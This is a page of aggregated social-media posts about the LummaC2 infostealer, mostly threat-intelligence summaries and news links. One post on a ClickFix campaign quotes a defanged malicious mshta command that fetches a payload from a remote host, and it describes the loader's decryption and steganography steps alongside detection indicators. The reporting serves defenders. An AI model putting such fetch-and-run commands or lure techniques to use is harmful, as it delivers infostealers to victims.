home.social

#lummac2 — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #lummac2, aggregated by home.social.

  1. A North Korean state-sponsored hacker got infected by #LummaC2 infostealer, exposing links to the $1.4B Bybit crypto heist, malicious tools, infrastructure and OPSEC failure.

    Read: hackread.com/north-korean-hack

    #CyberSecurity #NorthKorea #Bybit #Malware #InfoStealer

  2. Workforce shortage: a developer changed career to mine stone for Great Leader after infecting his own machine for testing, turning your operation into an online version of the imperialist video game Uplink.

    hudsonrock.com/northkorean

    #LummaC2

  3. 🎯 Threat Intelligence
    ===================

    Opening: Huntress documents a multi‑stage ClickFix social engineering campaign that culminates in infostealing malware delivery. The campaign evolves from simple "Human Verification" lures to more convincing fake Windows Update full‑screen prompts that instruct victims to paste and run a command via Win+R. Observed payloads include LummaC2 and Rhadamanthys.

    Technical Details: The initial lure auto‑copies a command to the clipboard; a representative command observed was mshta hXXp://81.0x5a.29[.]64/ebc/rps.gz as recorded in the report. The lure page contains an encrypted JavaScript blob (ENC) and a KEY_HEX value; the script implements a small decryption pipeline (hexToKey -> b64ToUint8Array -> xorDecode -> uint8ToUtf8) to reconstruct second‑stage JavaScript. That second stage is injected via an in‑memory Blob URL and revoked after execution. Notably, the final loader does not simply append data to files: the malware encodes the final stages directly into PNG pixel data, leveraging specific color channels to reconstruct and decrypt the payload in memory.

    Attack Chain Analysis:
    • Initial Access: Social engineering via ClickFix pages disguised as human verification or Windows Update screens.
    • Download: Initial fetch using mshta to retrieve compressed/encoded resources from remote hosts.
    • Execution: Decrypted JavaScript is injected via Blob URLs and executed in the browser context.
    • Loader: Steganographic PNGs deliver encrypted payloads embedded in pixel color channels; payloads are extracted and decrypted in memory.
    • Payloads: Infostealers observed include LummaC2 and Rhadamanthys.

    Detection: Observable indicators include clipboard manipulation following page visit, mshta fetches to unusual hosts, presence of encrypted ENC/KEY_HEX constructs in page source, Blob URL creation and rapid revocation, and PNG payloads with nonstandard pixel encodings. Huntress highlighted the dynamic loading of encrypted JavaScript as an evasion technique aimed at defeating string‑based detections.

    Mitigation: The source report does not provide specific defensive playbooks. Defensive teams should prioritize telemetry that captures mshta network fetches, suspicious Blob URL script injections, and anomalous image decoding activities on endpoints and in browsers.

    References and Context: Findings attributed to Huntress; campaign timeline begins in October with observed evolution from basic robot checks to sophisticated Windows Update impersonation.

    🔹 steganography #ClickFix #LummaC2 #Rhadamanthys #infostealer

    🔗 Source: huntress.com/blog/clickfix-mal

  4. Gefälschte Windows‑Updates: Wie der ClickFix‑Angriff Malware auf Windows-PCs schleust

    Ein neuer Einfall von Cyberkriminellen macht die Gefahr von gefälschten Windows‑Updates deutlich. Unter dem Namen ClickFix locken Angreifer Windows-Nutzer:innen mit einer täuschend echten Update‑Animation, die in einem Vollbild‑Browserfenster angezeigt wird. Während das Bild den Anschein erweckt, ein echtes Systemupdate zu installieren, steckt dahinter ein heimlicher Schadcode, der in den Pixeln eines Bildes verborgen ist.

    Mehr: maniabel.work/archiv/564

    #clickfixphishing #WindowsUpdate #ClickFix #PNGstagnography #LummaC2 #Rhadamanthys #infosec #infosecnews #BeDiS

  5. Happy Monday everyone!

    The AhnLab, Inc. Security Intelligence Center (ASEC) has been monitoring infostealer malware that is disguised as illegal software and keygens and found that most of the malware that is distributed in this manner has been the #LummaC2 infostealer BUT there has been an increase in distribution of the #ACRStealer as well. What is pretty interesting is the technique they use for C2. In this case they have used Steam, telegra.ph, Google Docs (Form) and Google Docs (Presentation). Enjoy and Happy Hunting!

    ACRStealer Infostealer Exploiting Google Docs as C2
    asec.ahnlab.com/en/86390/

    Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

  6. Hablando de todo un poco, nos están jodiendo pero bien los infostealers. Mucha actividad de #lummac2 últimamente.

    #ciberseguridad

  7. A #SexToy marketed under "Spencer’s #Sexology #Pussy Power 8-Function Rechargeable Bullet #Vibrator" was infected with #Lumma #malware
    bit.ly/4bToNPh
    #LummaC2 Stealer is an information stealer that started to being distributed as Malware-As-A-Service (#MaaS) around 2022 Aug and coded by #Shamel
    #Lumma targets #CryptoCurrency wallets
    as #internet browser extensions
    and with #2FA -two-factor authentication-